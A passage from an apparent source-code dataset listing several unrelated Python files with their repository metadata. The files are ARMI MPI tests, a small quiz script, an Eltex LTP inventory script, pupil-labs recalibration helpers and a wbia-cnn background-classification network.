    resized_image = retval[0]
    resized_image_shape = retval[-1]
    retval[0] = preprocessor.rgb_to_gray(resized_image)
    # Channel count becomes 1 after the grayscale conversion.
    retval[-1] = tf.concat([resized_image_shape[:-1], [1]], 0)
    return retval

  return functools.partial(grayscale_image_resizer)
| 41.037234
| 80
| 0.735839
|
794af79dde66fe9fd5d5c968f0c767073d4014a9
| 11,265
|
py
|
Python
|
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for featurest that need MPI, and thus require special testing.
These tests will be generally ignored by pytest if you are trying to run
them in an environment without MPI installed.
To run these tests from the commandline, install MPI, mpi4py, and do:
mpiexec -n 2 python -m pytest armi/tests/test_mpiFeatures.py
or
mpiexec.exe -n 2 python -m pytest armi/tests/test_mpiFeatures.py
"""
# pylint: disable=abstract-method,no-self-use,unused-argument
from distutils.spawn import find_executable
import os
import unittest
from armi import context
from armi import mpiActions
from armi import settings
from armi.interfaces import Interface
from armi.mpiActions import DistributeStateAction
from armi.operators import OperatorMPI
from armi.reactor import blueprints
from armi.reactor import reactors
from armi.reactor.parameters import parameterDefinitions
from armi.reactor.tests import test_reactors
from armi.tests import ARMI_RUN_PATH, TEST_ROOT
from armi.utils import pathTools
from armi.utils.directoryChangers import TemporaryDirectoryChanger
# determine if this is a parallel run, and MPI is installed
MPI_EXE = None
if find_executable("mpiexec.exe") is not None:
MPI_EXE = "mpiexec.exe"
elif find_executable("mpiexec") is not None:
MPI_EXE = "mpiexec"
class FailingInterface1(Interface):
    """Utility class to make sure the logging system fails properly.

    Its every-node hook always raises; MpiOperatorTests.test_masterException
    expects the RuntimeError to propagate out of operate() on rank 0.
    """

    name = "failer"

    def interactEveryNode(self, cycle, node):
        # Unconditional failure, regardless of cycle/node.
        raise RuntimeError("Failing interface failure")
class FailingInterface2(Interface):
    """Utility class to make sure the logging system fails properly.

    Like FailingInterface1, but used by test_masterCritical, which only
    asserts that *some* Exception escapes operate() on rank 0.
    """

    name = "failer"

    def interactEveryNode(self, cycle, node):
        # Unconditional failure, regardless of cycle/node.
        raise RuntimeError("Failing interface critical failure")
class FailingInterface3(Interface):
    """Interface that triggers its failure on the worker side of operate().

    The master broadcasts the "fail" command from its every-node hook;
    each worker's workerOperate() then raises.
    """

    name = "failer"

    def fail(self):
        raise RuntimeError("Failing interface critical worker failure")

    def interactEveryNode(self, c, n):  # pylint:disable=unused-argument
        # Broadcast the command so every worker rank runs workerOperate("fail").
        context.MPI_COMM.bcast("fail", root=0)

    def workerOperate(self, cmd):
        # Any command other than "fail" is not ours to handle.
        if cmd != "fail":
            return False
        self.fail()
        return True
class MpiOperatorTests(unittest.TestCase):
    """Testing the MPI parallelization operator."""

    def setUp(self):
        # Load the standard serial test reactor, then hand its settings to a
        # fresh MPI-aware operator and attach the reactor to it.
        self.old_op, self.r = test_reactors.loadTestReactor(TEST_ROOT)
        self.o = OperatorMPI(cs=self.old_op.cs)
        self.o.r = self.r

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_basicOperatorMPI(self):
        # Smoke test: a full operate() should complete cleanly under MPI.
        self.o.operate()

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_masterException(self):
        # A RuntimeError raised by an interface must propagate on the master
        # rank; the worker ranks are expected to keep operating normally.
        self.o.removeAllInterfaces()
        failer = FailingInterface1(self.o.r, self.o.cs)
        self.o.addInterface(failer)
        if context.MPI_RANK == 0:
            self.assertRaises(RuntimeError, self.o.operate)
        else:
            self.o.operate()

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_masterCritical(self):
        # Same scenario, but only requires that *some* Exception escapes
        # operate() on the master rank.
        self.o.removeAllInterfaces()
        failer = FailingInterface2(self.o.r, self.o.cs)
        self.o.addInterface(failer)
        if context.MPI_RANK == 0:
            self.assertRaises(Exception, self.o.operate)
        else:
            self.o.operate()
# these two must be defined up here so that they can be pickled
class BcastAction1(mpiActions.MpiAction):
    """MpiAction that fills a 50-slot list round-robin across ranks.

    Each rank writes only the indices congruent to its own rank modulo
    MPI_SIZE, then the per-rank lists are gathered and re-interleaved.
    Defined at module level so the action can be pickled for broadcast.
    """

    def invokeHook(self):
        nItems = 50
        results = [None] * nItems
        for objIndex in range(nItems):
            # This rank owns every MPI_SIZE-th slot starting at its rank.
            if objIndex % context.MPI_SIZE == context.MPI_RANK:
                results[objIndex] = objIndex
        allResults = self.gather(results)
        if allResults:
            # this is confounding!!!!
            # Slot ai was filled by rank (ai % MPI_SIZE), so pull element ai
            # out of that rank's gathered list to rebuild the full sequence.
            return [allResults[ai % context.MPI_SIZE][ai] for ai in range(nItems)]
        # Ranks where gather() returned nothing implicitly return None.
class BcastAction2(mpiActions.MpiAction):
    """MpiAction that round-trips 0..49 through mpiIter/gather/mpiFlatten.

    Defined at module level so the action can be pickled for broadcast.
    """

    def invokeHook(self):
        # Collect this rank's share of the iteration domain.
        local = list(self.mpiIter(range(50)))
        gathered = self.gather(local)
        if gathered:
            # Flatten the per-rank lists back into one sequence.
            return self.mpiFlatten(gathered)
class MpiDistributeStateTests(unittest.TestCase):
    """Tests for DistributeStateAction: broadcasting settings, reactor and
    interfaces from the master rank to the worker ranks."""

    def setUp(self):
        # Build an operator/reactor pair from the standard test settings and
        # wire a DistributeStateAction onto it by hand.
        self.cs = settings.Settings(fName=ARMI_RUN_PATH)
        bp = blueprints.loadFromCs(self.cs)
        settings.setMasterCs(self.cs)
        self.o = OperatorMPI(self.cs)
        self.o.r = reactors.factory(self.cs, bp)
        self.action = DistributeStateAction()
        self.action.o = self.o
        self.action.r = self.o.r

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_distributeSettings(self):
        """Under normal circumstances, we would not test "private" methods;
        however, distributeState is quite complicated.
        """
        self.action._distributeSettings()
        if context.MPI_RANK == 0:
            # The master keeps its original settings object.
            self.assertEqual(self.cs, self.action.o.cs)
        else:
            # Workers get a broadcast copy: a distinct object whose values
            # (apart from a few known-to-differ keys) match the original.
            self.assertNotEqual(self.cs, self.action.o.cs)
            original = {ss.name: ss.value for ss in self.cs.values()}
            current = {ss.name: ss.value for ss in self.action.o.cs.values()}
            # remove values that are *expected to be* different...
            # crossSectionControl is removed because unittest is being mean about
            # comparing dicts...
            for key in ["stationaryBlocks", "verbosity", "crossSectionControl"]:
                if key in original:
                    del original[key]
                if key in current:
                    del current[key]
            for key in original.keys():
                self.assertEqual(original[key], current[key])

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_distributeReactor(self):
        """Under normal circumstances, we would not test "private" methods;
        however, distributeState is quite complicated.
        """
        original_reactor = self.action.r
        self.action._distributeReactor(self.cs)
        if context.MPI_RANK == 0:
            # Master keeps its reactor object; workers receive a new one.
            self.assertEqual(original_reactor, self.action.r)
        else:
            self.assertNotEqual(original_reactor, self.action.r)
        # The cross-section library is not distributed with the reactor.
        self.assertIsNone(self.action.r.core.lib)

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_distributeInterfaces(self):
        """Under normal circumstances, we would not test "private" methods;
        however, distributeState is quite complicated.
        """
        original_interfaces = self.o.interfaces
        self.action._distributeInterfaces()
        if context.MPI_RANK == 0:
            self.assertEqual(original_interfaces, self.o.interfaces)
        else:
            # NOTE: workers also compare equal here — interface distribution
            # reproduces an equivalent interface stack on every rank.
            self.assertEqual(original_interfaces, self.o.interfaces)

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_distributeState(self):
        # Full distributeState: checks settings, reactor, blueprints,
        # interfaces and xs library on both master and worker ranks.
        original_reactor = self.o.r
        original_lib = self.o.r.core.lib
        original_interfaces = self.o.interfaces
        original_bolassems = self.o.r.blueprints.assemblies
        self.action.invokeHook()
        if context.MPI_RANK == 0:
            # Master state is untouched.
            self.assertEqual(self.cs, self.o.cs)
            self.assertEqual(original_reactor, self.o.r)
            self.assertEqual(original_interfaces, self.o.interfaces)
            self.assertDictEqual(original_bolassems, self.o.r.blueprints.assemblies)
            self.assertEqual(original_lib, self.o.r.core.lib)
        else:
            # Workers get fresh (broadcast) objects for settings/reactor/
            # blueprints, but equivalent interfaces and xs library.
            self.assertNotEqual(self.cs, self.o.cs)
            self.assertNotEqual(original_reactor, self.o.r)
            self.assertNotEqual(original_bolassems, self.o.r.blueprints.assemblies)
            self.assertEqual(original_interfaces, self.o.interfaces)
            self.assertEqual(original_lib, self.o.r.core.lib)
        # After distribution, no parameter should still be flagged as
        # assigned-since-last-distribute-state.
        for pDef in parameterDefinitions.ALL_DEFINITIONS:
            self.assertFalse(
                pDef.assigned & parameterDefinitions.SINCE_LAST_DISTRIBUTE_STATE
            )

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_compileResults(self):
        # The explicit round-robin action and the mpiIter-based action must
        # produce identical compiled results.
        action1 = BcastAction1()
        context.MPI_COMM.bcast(action1)
        results1 = action1.invoke(None, None, None)

        action2 = BcastAction2()
        context.MPI_COMM.bcast(action2)
        results2 = action2.invoke(None, None, None)
        self.assertEqual(results1, results2)
class MpiPathToolsTests(unittest.TestCase):
    """Tests of pathTools.cleanPath() in the MPI scenario."""

    @staticmethod
    def _writeFile(path, contents):
        """Write a small text file, closing the handle immediately.

        The original used ``open(path, "w").write(...)``, which leaks the
        file handle; an open handle can block the subsequent delete on
        Windows (where these MPI tests commonly run), making the very
        cleanPath() behavior under test flaky.
        """
        with open(path, "w") as stream:
            stream.write(contents)

    @unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
    def test_cleanPathMpi(self):
        """Simple tests of cleanPath(), in the MPI scenario."""
        with TemporaryDirectoryChanger():
            # TEST 0: File is not safe to delete, due to name pathing
            filePath0 = "test0_cleanPathNoMpi"
            self._writeFile(filePath0, "something")

            self.assertTrue(os.path.exists(filePath0))
            with self.assertRaises(Exception):
                pathTools.cleanPath(filePath0, mpiRank=context.MPI_RANK)

            # TEST 1: Delete a single file
            filePath1 = "test1_cleanPathNoMpi_mongoose"
            self._writeFile(filePath1, "something")

            self.assertTrue(os.path.exists(filePath1))
            pathTools.cleanPath(filePath1, mpiRank=context.MPI_RANK)
            self.assertFalse(os.path.exists(filePath1))

            # TEST 2: Delete an empty directory
            dir2 = "mongoose"
            os.mkdir(dir2)

            self.assertTrue(os.path.exists(dir2))
            pathTools.cleanPath(dir2, mpiRank=context.MPI_RANK)
            self.assertFalse(os.path.exists(dir2))

            # TEST 3: Delete a directory with two files inside
            # create directory
            dir3 = "mongoose"
            os.mkdir(dir3)

            # throw in a couple of simple text files
            self._writeFile(os.path.join(dir3, "file1.txt"), "something1")
            self._writeFile(os.path.join(dir3, "file2.txt"), "something2")

            # delete the directory and test
            self.assertTrue(os.path.exists(dir3))
            self.assertTrue(os.path.exists(os.path.join(dir3, "file1.txt")))
            self.assertTrue(os.path.exists(os.path.join(dir3, "file2.txt")))
            pathTools.cleanPath(dir3, mpiRank=context.MPI_RANK)
            self.assertFalse(os.path.exists(dir3))
if __name__ == "__main__":
    # Intentionally a no-op when run directly: these tests are meaningless
    # in a serial interpreter and must be launched under MPI:
    #
    # mpiexec -n 2 python -m pytest armi/tests/test_mpiFeatures.py
    # or
    # mpiexec.exe -n 2 python -m pytest armi/tests/test_mpiFeatures.py
    pass
| 37.178218
| 84
| 0.663826
|
794af7f9a08a43e569f28436735af484f5d91926
| 1,341
|
py
|
Python
|
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
# Marcus Lycke
# Teinf-20
# Quiz
# 16-03-2022
from Quiz_questions import question_data
from Quiz import Question
from Quiz import Quiz

# Classes
# Build Question objects from the raw question/answer dicts supplied by
# Quiz_questions.question_data.
question_bank = []
for q in question_data:
    question_text = q["question"]
    question_answer = q["answer"]
    new_question = Question(question_text, question_answer)
    question_bank.append(new_question)

# Run the quiz until no questions remain, then report the final score.
quiz = Quiz(question_bank)
while quiz.remaining_questions():
    quiz.next_question()

print("Game Over. Well played!")
print(f"Your final score was: {quiz.score}/{quiz.question_number}\n")

# NOTE(review): the two triple-quoted string literals below are dead code
# (no-op expression statements) left over from earlier drafts.
"""
║ ║ ║
║║ ║║ ║
║ ║ ║ ║
║ ║.╚════
"""
"""
from secrets import choice
from Resources import Questions, Quiz
def main():
    question_bank = []
    question1 = Questions("Who is tallest in the class/Tim/Tim, Jesper, Marcus, Oliver")
    question2 = Questions("")
    question3 = Questions("")
    question4 = Questions("")
    question5 = Questions("")
    question_bank.append(question1)
    question_bank.append(question2)
    question_bank.append(question3)
    question_bank.append(question4)
    question_bank.append(question5)
    quiz = Quiz("The Quiz", question_bank, 0)
    print(f"Welcome to {quiz.get_name()}\n")
    while len(question_bank) != 0:
        current_question = choice(question_bank)
        print(current_question.get_question)
"""
| 20.953125
| 88
| 0.677107
|
794af8f3bd58327853b7178ec3e5aef2eab044aa
| 2,282
|
py
|
Python
|
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Eltex.LTP.get_inventory
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
    """Eltex.LTP.get_inventory: report chassis and power-module inventory.

    Tries SNMP first (execute_snmp) and falls back to CLI parsing of
    "show system environment" (execute_cli), per the BaseScript contract.
    """

    name = "Eltex.LTP.get_inventory"
    interface = IGetInventory
    cache = True

    # Parses the TYPE / HW_revision / SN block of "show system environment";
    # the three lines must appear consecutively, in this order.
    rx_platform = re.compile(
        r"^\s*TYPE:\s+(?P<part_no>\S+)\s*\n"
        r"^\s*HW_revision:\s+(?P<revision>\S+)\s*\n"
        r"^\s*SN:\s+(?P<serial>\S+)",
        re.MULTILINE,
    )
    # Matches power-module lines whose part number starts with "PM".
    rx_pwr = re.compile(r"^\s*Module (?P<num>\d+): (?P<part_no>PM\S+)", re.MULTILINE)

    def execute_snmp(self, **kwargs):
        # Chassis info comes from get_version(); serial/revision are only
        # present when that script returned an "attributes" dict.
        v = self.scripts.get_version()
        r = [{"type": "CHASSIS", "vendor": "ELTEX", "part_no": v["platform"]}]
        if "attributes" in v:
            r[-1]["serial"] = v["attributes"]["Serial Number"]
            r[-1]["revision"] = v["attributes"]["HW version"]
        # Eltex private MIB OIDs — presumably PSU slot number and part
        # number respectively; verify against the vendor MIB.
        pwr_num = self.snmp.get("1.3.6.1.4.1.35265.1.22.1.17.1.2.1")
        pwr_pn = self.snmp.get("1.3.6.1.4.1.35265.1.22.1.17.1.3.1")
        # Keep only the first whitespace-separated token of the part number.
        pwr_pn = pwr_pn.split()[0]
        r += [{"type": "PWR", "vendor": "ELTEX", "part_no": pwr_pn, "number": pwr_num}]
        return r

    def execute_cli(self, **kwargs):
        try:
            v = self.cli("show system environment", cached=True)
        except self.CLISyntaxError:
            # Command unsupported on this platform/firmware; signal the
            # framework to try another access method.
            raise NotImplementedError
        match = self.rx_platform.search(v)
        r = [
            {
                "type": "CHASSIS",
                "vendor": "ELTEX",
                "part_no": match.group("part_no"),
                "serial": match.group("serial"),
                "revision": match.group("revision"),
            }
        ]
        # One PWR entry per power module reported in the environment output.
        for match in self.rx_pwr.finditer(v):
            r += [
                {
                    "type": "PWR",
                    "vendor": "ELTEX",
                    "part_no": match.group("part_no"),
                    "number": match.group("num"),
                }
            ]
        return r
| 33.072464
| 87
| 0.463628
|
794af8ffb664dc856d1e768575d69406960af2c7
| 4,639
|
py
|
Python
|
code/functions/pl_recalib.py
|
behinger/etcomp
|
f30389da49c3416c7a723d44951d197d6e89d40e
|
[
"MIT"
] | 20
|
2018-08-08T07:08:46.000Z
|
2022-03-07T14:49:06.000Z
|
code/functions/pl_recalib.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 32
|
2017-12-05T14:05:48.000Z
|
2020-10-20T10:29:43.000Z
|
code/functions/pl_recalib.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 7
|
2018-12-09T22:53:10.000Z
|
2021-11-10T09:13:04.000Z
|
# -*- coding: utf-8 -*-
import numpy as np
# Pretty serious workaround. Ignores errors in imports :S
import builtins
from types import ModuleType
import logging
logger = logging.getLogger(__name__)
class DummyModule(ModuleType):
    """Stand-in module object whose every attribute lookup yields ``None``.

    Returned by ``tryimport`` when a real import fails, so downstream code
    that merely touches attributes of the missing module keeps running.
    """

    def __getattr__(self, key):
        # Resolve any attribute that ModuleType itself doesn't define.
        return None
__all__ = [] # support wildcard imports
def tryimport(name, *args, **kwargs):
    """Replacement for builtins.__import__ that never raises.

    Delegates to the saved real import (``realimport``, bound below when the
    hook is installed); on any failure it substitutes ``pickle`` for the
    Py2-only ``cPickle`` and otherwise returns a DummyModule so attribute
    access on the missing module is a no-op.
    """
    try:
        imp = realimport(name, *args,**kwargs)
        #print('success: '+name)
        return imp
    except Exception as e:
        print('reached exception:' + name)
        if name =='cPickle': # because how they import cPickle/Pickle
            # Py3 shim: the pupil-labs code imports cPickle directly.
            return realimport('pickle', *args,**kwargs)
        #print(e)
        return DummyModule(name)
# Temporarily install tryimport as the global import hook, saving the real
# one in `realimport`, so the pupil-labs imports below survive missing
# optional dependencies (failed imports become DummyModule instances).
realimport, builtins.__import__ = builtins.__import__, tryimport
try:
    from lib.pupil.pupil_src.shared_modules.calibration_routines.finish_calibration import finish_calibration,select_calibration_method
    from lib.pupil.pupil_src.shared_modules.gaze_producers import calibrate_and_map
    import lib.pupil.pupil_src.shared_modules.player_methods
except Exception as e:
    # Even with the forgiving hook, log anything that still goes wrong.
    print('-------------------')
    print(e)
    pass
# Restore the real import hook (and stash tryimport back into its name).
tryimport, builtins.__import__ = builtins.__import__, realimport
#raise
class global_container():
    """Bare attribute bag used to fake pupil-labs' ``g_pool`` objects.

    Instances start empty; callers attach whatever attributes the
    calibration/mapping code expects (see ``gen_fakepool``).
    """

    pass
def list_to_stream(gaze_list):
    """Serialize each gaze datum with msgpack (bin type enabled).

    Newer pupil-labs versions (>= 1.8) expect msgpack-serialized payloads
    rather than raw dicts.
    """
    import msgpack

    packed = []
    for gaze in gaze_list:
        packed.append(msgpack.packb(gaze, use_bin_type=True))
    return packed
def notify_all(self,notification=''):
    # Stub for Plugin.notify_all: just log the notification instead of
    # dispatching it. Bound onto fake_gpool.active_calibration_plugin in
    # gen_fakepool() below.
    logger.info(notification)
def gen_fakepool(inp_gaze=[],calibration_mode='2d'):
    """Build a minimal stand-in for pupil-labs' ``g_pool`` object.

    Only the attributes actually read by the calibration/mapping code are
    provided; everything else is absent by design.

    NOTE(review): mutable default argument (``[]``) — only read here, but
    fragile if the list is ever mutated.
    """
    from lib.pupil.pupil_src.shared_modules.plugin import Plugin_List
    fake_gpool = global_container()
    fake_gpool.capture =global_container()
    # Assumed world-camera resolution — TODO confirm against the recordings.
    fake_gpool.capture.frame_size=(1280,960)
    fake_gpool.window_size =(1280,960)
    fake_gpool.min_calibration_confidence = 0.6
    fake_gpool.gaze_positions_by_frame = inp_gaze
    # 'not-capture' steers pupil-labs code down its offline/player path.
    fake_gpool.app = 'not-capture'
    fake_gpool.user_dir = '/work'
    fake_gpool.rec_dir = '/work'
    fake_gpool.detection_mapping_mode = calibration_mode
    fake_gpool.plugin_by_name = ''
    fake_gpool.plugins = Plugin_List(fake_gpool,[])
    # Plugin cleanup is a no-op for the fake pool.
    fake_gpool.plugins.clean = lambda: None
    fake_gpool.active_calibration_plugin = global_container()
    # notify_all (module-level stub above) just logs notifications.
    fake_gpool.active_calibration_plugin.notify_all = notify_all
    fake_gpool.get_timestamp = lambda: None
    return(fake_gpool)
def pl_recalibV2(pupil_list,ref_list,inp_gaze,calibration_mode='2d',eyeID=None): # eye could be 0 or 1
    """Re-run pupil-labs calibration and gaze mapping offline.

    Copies the recorded pupil/reference/gaze data, feeds them through
    pupil-labs' ``calibrate_and_map`` generator on a fake g_pool, and
    collects the remapped gaze samples.

    :param calibration_mode: '2d' or '3d' mapping pipeline.
    :param eyeID: if given (0 or 1), only pupil data from that eye is used.
    :return: list of remapped gaze samples.
    """
    if calibration_mode == '3d':
        from lib.pupil.pupil_src.shared_modules.calibration_routines.optimization_calibration import bundle_adjust_calibration #we magically need this for libceres to work
        #from calibration_routines.gaze_mappers import Binocular_Vector_Gaze_Mapper
        #from calibration_routines.gaze_mappers import Monocular_Gaze_Mapper
        #from calibration_routines.gaze_mappers import Vector_Gaze_Mapper
    import copy
    import sys
    # Shallow copies so the caller's lists aren't rebound/serialized in place.
    pupil = copy.copy(pupil_list)
    ref = copy.copy(ref_list)
    gaze = copy.copy(inp_gaze)
    # to check pupil labs version
    if hasattr(lib.pupil.pupil_src.shared_modules.player_methods, 'Bisector'):
        # pupil-labs v1.8 or newer needs the data msgpack-serialized
        pupil = list_to_stream(pupil)
        gaze = list_to_stream(gaze)
    if eyeID is not None: # keep only pupil data from the requested eye
        pupil = [p for p in pupil if p['id']==eyeID]
    fake_gpool = gen_fakepool(gaze,calibration_mode)
    #method, result = select_calibration_method(fake_gpool, pupil_list, ref_list)
    logger.info(calibrate_and_map)
    calib_generator = calibrate_and_map(fake_gpool,ref,pupil,gaze,0,0)
    tmp = next(calib_generator) # start once
    output = []
    try:
        i = 0
        while True:
            i += 1
            newsamp = next(calib_generator)
            # The generator signals completion via a status string.
            if newsamp[0] == 'Mapping complete.':
                logger.info('Mapping complete')
                break
            # Progress logging roughly every 100k samples.
            if i%100000 == 1:
                logger.info(newsamp[0])
            try:
                output.append(newsamp[1][0])
            except Exception as e:
                # Unexpected sample shape: dump it and keep going.
                print(newsamp)
    except StopIteration:
        # Generator exhausted without the completion sentinel.
        logger.error('error')
        pass
    calib_generator.close()
    return(output)
| 32.900709
| 175
| 0.639577
|
794afae89f7158603c786fc473c9f1604778cba0
| 8,703
|
py
|
Python
|
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | null | null | null |
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | null | null | null |
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | 1
|
2021-05-27T15:33:26.000Z
|
2021-05-27T15:33:26.000Z
|
# -*- coding: utf-8 -*-
import logging
import functools
import six
import numpy as np
import utool as ut
from wbia_cnn import ingest_data
import lasagne
from lasagne import layers, nonlinearities
from theano import tensor as T # NOQA
from wbia_cnn.models import abstract_models
print, rrr, profile = ut.inject2(__name__)
logger = logging.getLogger()
class NonlinearityLayerSpatial(lasagne.layers.NonlinearityLayer):
    def __init__(self, incoming, nonlinearity=nonlinearities.rectify, **kwargs):
        """The spatial version of a nonlinearity as applied across all spatial
        dimensions of a network's output.
        """
        super(NonlinearityLayerSpatial, self).__init__(incoming, **kwargs)
        self.nonlinearity = (
            nonlinearities.identity if nonlinearity is None else nonlinearity
        )
        in_batch, in_channels, in_width, in_height = self.input_shape
        # With 1x1 spatial output the tensor can simply be flattened to
        # (N, C) before applying the nonlinearity.
        self.reshape_required = in_width == 1 and in_height == 1

    def get_output_for(self, input, **kwargs):
        old_shape = T.shape(input)
        if self.reshape_required:
            input = T.reshape(input, (-1, old_shape[1]))
            return self.nonlinearity(input)
        elif input.ndim == 4:
            # Move channels last, fold the spatial positions into the batch
            # axis, apply the nonlinearity per spatial position, then restore
            # the original (N, C, W, H) layout.
            input = input.dimshuffle((0, 3, 2, 1))
            temp = T.shape(input)
            input = T.reshape(input, (-1, old_shape[1]))
            activation = self.nonlinearity(input)
            activation = T.reshape(activation, temp)
            activation = activation.dimshuffle((0, 3, 2, 1))  # Transpose
            return activation
        else:
            # Fall back to the plain NonlinearityLayer behavior.
            _super = super(NonlinearityLayerSpatial, self)
            return _super.get_output_for(input, **kwargs)

    def get_output_shape_for(self, input_shape):
        if self.reshape_required:
            # Flattened case: output is (batch, channels).
            return input_shape[:2]
        else:
            _super = super(NonlinearityLayerSpatial, self)
            return _super.get_output_shape_for(input_shape)
@six.add_metaclass(ut.ReloadingMetaclass)
class BackgroundModel(abstract_models.AbstractCategoricalModel):
    """Fully-convolutional background/foreground classifier.

    Per project convention the first method argument is named ``model``
    rather than ``self``.
    """

    def __init__(
        model,
        autoinit=False,
        batch_size=128,
        data_shape=(48, 48, 3),
        num_output=2,
        **kwargs
    ):
        # NOTE(review): `autoinit` is accepted but never used in this body.
        model.num_output = num_output
        super(BackgroundModel, model).__init__(
            batch_size=batch_size, data_shape=data_shape, name='background', **kwargs
        )

    def learning_rate_update(model, x):
        # Halve the learning rate (called by the training harness).
        return x / 2.0

    def learning_rate_shock(model, x):
        # Double the learning rate to escape plateaus.
        return x * 2.0

    def augment(model, Xb, yb=None):
        # Random horizontal flips, 50% chance per sample; mutates Xb in place.
        import random
        import cv2

        for index, X in enumerate(Xb):
            if random.uniform(0.0, 1.0) <= 0.5:
                Xb[index] = cv2.flip(X, 1)
        return Xb, yb

    def get_background_def(model, verbose=ut.VERBOSE, **kwargs):
        """Return the layer-constructor list defining the architecture.

        Four conv/dropout(/pool) stages followed by a 1x1 NIN classifier and
        a spatial softmax, so the net stays fully convolutional.
        """
        _P = functools.partial
        hidden_initkw = {
            'nonlinearity': nonlinearities.LeakyRectify(leakiness=(1.0 / 10.0))
        }
        from wbia_cnn import custom_layers

        Conv2DLayer = custom_layers.Conv2DLayer
        MaxPool2DLayer = custom_layers.MaxPool2DLayer
        # DenseLayer = layers.DenseLayer

        network_layers_def = [
            _P(layers.InputLayer, shape=model.input_shape),
            _P(
                Conv2DLayer,
                num_filters=16,
                filter_size=(11, 11),
                name='C0',
                **hidden_initkw
            ),
            _P(layers.DropoutLayer, p=0.1, name='D0'),
            _P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P0'),
            _P(
                Conv2DLayer,
                num_filters=32,
                filter_size=(5, 5),
                name='C1',
                **hidden_initkw
            ),
            _P(layers.DropoutLayer, p=0.2, name='D1'),
            _P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P1'),
            _P(
                Conv2DLayer,
                num_filters=64,
                filter_size=(3, 3),
                name='C2',
                **hidden_initkw
            ),
            _P(layers.DropoutLayer, p=0.3, name='D2'),
            _P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P2'),
            _P(
                Conv2DLayer,
                num_filters=128,
                filter_size=(3, 3),
                name='C4',
                **hidden_initkw
            ),
            _P(layers.DropoutLayer, p=0.4, name='D4'),
            # 1x1 "network-in-network" layer acts as a per-position classifier.
            _P(layers.NINLayer, num_units=model.num_output, name='F3', nonlinearity=None),
            _P(NonlinearityLayerSpatial, name='S0', nonlinearity=nonlinearities.softmax),
        ]
        return network_layers_def

    def init_arch(model, verbose=ut.VERBOSE, **kwargs):
        r"""Instantiate the layer definitions and record the output layer."""
        (_, input_channels, input_width, input_height) = model.input_shape
        if verbose:
            logger.info('[model] Initialize background model architecture')
            logger.info('[model] * batch_size = %r' % (model.batch_size,))
            logger.info('[model] * input_width = %r' % (input_width,))
            logger.info('[model] * input_height = %r' % (input_height,))
            logger.info('[model] * input_channels = %r' % (input_channels,))
            logger.info('[model] * output_dims = %r' % (model.output_dims,))
        network_layers_def = model.get_background_def(verbose=verbose, **kwargs)
        # connect and record layers
        from wbia_cnn import custom_layers

        network_layers = custom_layers.evaluate_layer_list(
            network_layers_def, verbose=verbose
        )
        # model.network_layers = network_layers
        output_layer = network_layers[-1]
        model.output_layer = output_layer
        return output_layer
def train_background(output_path, data_fpath, labels_fpath):
    r"""Train the background model on an on-disk numpy dataset.

